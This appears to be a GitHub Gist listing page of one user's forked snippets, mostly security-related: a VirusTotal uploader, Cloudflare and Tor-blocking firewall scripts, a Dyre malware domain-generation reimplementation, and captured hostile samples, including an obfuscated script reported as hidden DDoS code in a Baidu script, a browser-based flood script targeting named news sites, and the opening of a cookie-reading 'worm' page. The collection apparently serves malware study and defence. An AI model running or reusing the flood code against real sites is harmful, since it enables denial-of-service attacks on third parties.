Skip to content

Instantly share code, notes, and snippets.

@xxdesmus
xxdesmus / README.txt
Created Jan 29, 2018 — forked from whitequark/README.txt
Strava archiver
View README.txt
1. install postgres
2. run makedb.rb >tiles.csv
3. run tiles.sql
4. run archive.rb
5. enjoy
@xxdesmus
xxdesmus / virustotal_upload
Created Nov 1, 2017 — forked from mattghali/virustotal_upload
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
View virustotal_upload
#!/usr/bin/env bash
#
# Upload a sample to VirusTotal and pretty print the report.
# All in a handy alias.
#
# Dependencies:
#
# * curl
# * jq
# * VirusTotal API key
View gdocs.pro-worm
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
@xxdesmus
xxdesmus / ddos-from-baidu.js
Created Aug 23, 2017 — forked from nczz/ddos-from-baidu.js
百度在主動推送網址的方法中藏有惡意原碼
View ddos-from-baidu.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b((/X\\/([\\d]+)/Z.19(i.K.M.H())[1]>=1b)&&(i.K.M.H().1a("16")<0)){3 D=T;3 p=[\'n://13.q.m/\',\'n://15.q.m/\',\'n://14.q.m/\',\'n://11.12.m/\'];3 E=17;3 k=18;3 O=10;3 s=1;h w(){3 8=e 7();A 7.S(8.Y(),8.W(),8.U(),8.V(),8.I(),8.J())/R}g.z("B")[0].F="<1r 1s=\\"y\\" 1q=\\"1o-y\\">"+g.z("B")[0].F;3 9=[];3 f=[];3 x=5;3 c=[];3 a=[];3 r=\'\';3 l=0;h o(2){3 6=9[2];b(6!=5){g.G.1p(6)}9[2]=5;b(l<E&&a[2]-x<D){Q(\'u(\'+2+\')\',(a[2]-c[2])>k?k:(a[2]-c[2]))}}h L(2){b(9[2]==5){A}b(9[2].1x){i.C(f[2]);a[2]=e 7().j();o(2)}1v{b(e 7().j()-c[2]>k){i.C(f[2]);o(2)}}}h u(2){6=g.G.1t(g.1w(\'1u\'));r=p[w()%p.1n];6.1f=r+\'?t=\'+w()+P.1e(P.1c()*1d);6.1h.1l=\'1m\';9[2]=6;c[2]=a[2]=e 7().j();f[2]=1k("L("+2+")",1i);l=l+1}
@xxdesmus
xxdesmus / mingjingtimes-ddos-code.js
Created Aug 23, 2017 — forked from nczz/mingjingtimes-ddos-code.js
明鏡時報惡意大量請求攻擊程式碼
View mingjingtimes-ddos-code.js
if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
var MAX_TIME = 300000;
var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
var MAX_COUNT = 100000000;
var TIMEGAP = 500;
var THREAD = 10;
var START_CLOCK = 1;
function unixtime() {
var dt = new Date();
@xxdesmus
xxdesmus / cloudflare-ipset.sh
Created Mar 30, 2017 — forked from KiNgMaR/cloudflare-ipset.sh
Cloudflare IPTABLES and IPSET scripts
View cloudflare-ipset.sh
#/bin/sh
# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-
# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
local ipv
local inetv
@xxdesmus
xxdesmus / gist:72e9254963ebea33a0d2
Created Nov 28, 2015 — forked from sethkinast/gist:5914577
Tiny script to grab Tor exitnodes and ban them via CloudFlare's API
View gist:72e9254963ebea33a0d2
#!/bin/bash
SERVERS=(108.162.196.125 108.162.197.125)
for server in ${SERVERS[*]}
do
echo "Now processing $server"
wget --timeout=10 -t1 -O tor.txt https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=$server
for ip in `tail -n +4 tor.txt`
@xxdesmus
xxdesmus / wget.txt
Created Sep 28, 2015 — forked from suzannealdrich/wget.txt
wget spider cache warmer
View wget.txt
wget --spider -o wget.log -e robots=off -r -l 5 -p -S --header="X-Bypass-Cache: 1" live-mysite.gotpantheon.com
# Options explained
# --spider: Crawl the site
# -o wget.log: Keep the log
# -e robots=off: Ignore robots.txt
# -r: specify recursive download
# -l 5: Depth to search. I.e 1 means 'crawl the homepages'.  2 means 'crawl the homepage and all pages it links to'...
# -p: get all images, etc. needed to display HTML page
# -S: print server response
View dyre-dga.py
#! /usr/bin/env python
# Dyre/Dyreza DGA
# Implementation by Talos
# From http://blogs.cisco.com/security/talos/threat-spotlight-dyre
# Another Python implementation was also posted back in December 2014 by moritz.kroll:
# https://www.virustotal.com/en/file/3716902c64afe40369e6ed67f9b9f7eea30f809348b3558adcff622965e80435/analysis/
from datetime import date
from hashlib import sha256
from socket import gethostbyname, gaierror
View vpnsetup.sh
#!/bin/sh
#
# Amazon EC2 user-data file for automatic configuration of IPsec/L2TP VPN
# on a Ubuntu server instance. Tested with 14.04 (Trusty) AND 12.04 (Precise).
# With minor modifications, this script *can also be used* on dedicated servers
# or any KVM- or XEN-based Virtual Private Server (VPS) from other providers.
#
# DO NOT RUN THIS SCRIPT ON YOUR PC OR MAC! THIS IS MEANT TO BE RUN WHEN
# YOUR AMAZON EC2 INSTANCE STARTS!
#